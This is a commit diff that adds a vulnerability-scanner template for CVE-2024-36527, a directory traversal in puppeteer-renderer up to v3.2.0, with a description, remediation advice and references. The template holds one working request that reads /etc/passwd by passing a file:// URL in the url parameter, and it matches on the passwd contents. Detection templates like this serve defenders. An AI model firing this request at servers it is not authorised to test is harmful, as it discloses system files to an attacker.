Merge pull request #10088 from projectdiscovery/César-Calderón-9b5bmYyg5MrArWXsSiaRy7

Added template for CVE-2024-36527
2024-06-25 16:09:18 +08:00 · 2024-06-25 16:09:18 +08:00 · 10b7785b4d
parent 264f696ef0 cc3d802a65
commit 10b7785b4d
1 changed files with 35 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-36527.yaml
+++ b/http/cves/2024/CVE-2024-36527.yaml
@ -0,0 +1,35 @@
+id: CVE-2024-36527
+
+info:
+  name: Puppeteer Renderer  - Directory Traversal
+  author: Stux
+  severity: medium
+  description: |
+    puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially gaining access to sensitive information.
+  remediation: |
+    Users should update to version 3.3.0 or later where this issue has been addressed. Additionally, ensure that input validation is implemented to restrict the url parameter to only http and https protocols.
+  reference:
+    - https://github.com/zenato/puppeteer-renderer/issues/97
+    - https://gist.github.com/7a6163/25fef08f75eed219c8ca21e332d6e911
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2024,puppeteer-renderer
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/html?url=file:///etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200